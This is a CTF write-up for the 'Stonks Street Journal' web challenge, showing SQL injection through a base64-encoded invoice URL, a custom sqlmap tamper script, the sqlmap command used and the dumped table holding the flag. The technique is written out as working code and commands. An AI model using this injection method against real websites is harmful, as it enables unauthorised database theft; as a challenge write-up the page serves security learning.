πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
SEETF 2022
Cyber League Major 1
STANDCON CTF 2021
2022
BSidesTLV 2022 CTF
Grey Cat The Flag 2022
DEF CON CTF 2022 Qualifiers
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
Lukas App
Finance Calculat0r 2021
Personal Encryptor with Nonbreakable Inforation-theoretic Security
Enterprice File Sharing
Payback
Stonks Street Journal
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
Stonks Street Journal

Solution

After signing up on the website, we can view our invoice. The invoice URL appears to be in the format /legacy_invoice_system/BASE64_ENCODED_STRING.
This base64-encoded string decodes to USERNAME-YEAR-MONTH-DAY
Adding a ' to the back of the username yielded an SQL error:
1
syntax error at or near "2021"
2
LINE 1: ...riber WHERE username='zeyu2001'' AND signup_date='2021-11-27...
3
^
Copied!
It appears that the input string is split into the username and signup date, and both are passed into the SQL query without sanitization.
We can use a custom SQLMap tamper script that appends the payload to the back of the signup date, and then base64-encodes the entire input string before passing it into the custom injection point at GET /legacy_invoice_system/*
1
import base64
2
from lib.core.enums import PRIORITY
3
​
4
# Define which is the order of application of tamper scripts against the payload
5
__priority__ = PRIORITY.NORMAL
6
​
7
def tamper(payload, **kwargs):
8
​
9
retVal = base64.b64encode(('zeyu2001-2021-11-27' + payload).encode()).decode()
10
11
return retVal
Copied!
Running sqlmap -r invoice.req --tamper tamper.py --threads 10 -T news_article --dump, we can dump the database which contains the flag.
1
Database: public
2
Table: news_article
3
[4 entries]
4
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
5
| id | text | headline | publish_time |
6
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
7
| 1 | My most favourite flag was: CSR{welc0me_0n_b0ard} | Flags are sometimes hard to find, but always beautiful | 2021-11-26 08:33:33.159482+00 |
8
| 2 | <blank> | Elin [Nordegren] said I was obsessed with golf, but when I started sleeping with other women, that wasn’t good enough either. | 2021-11-26 08:33:33.166128+00 |
9
| 3 | <blank> | Struggling to stay on their feet as they stood outside their assigned polling place, the nine members of the U.S. Supreme Court reportedly | 2021-11-26 08:33:33.16646+00 |
10
| 4 | <blank> | Former U.S. secretary of defense Donald Rumsfeld passed away Wednesday at 88 years old, sources confirmed, and is survived by 1 million fewer Iraqis. | 2021-11-26 08:33:33.166761+00 |
11
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
Copied!
Previous
Payback
Next - 2021
The InfoSecurity Challenge (TISC) 2021
Last modified 1mo ago
Copy link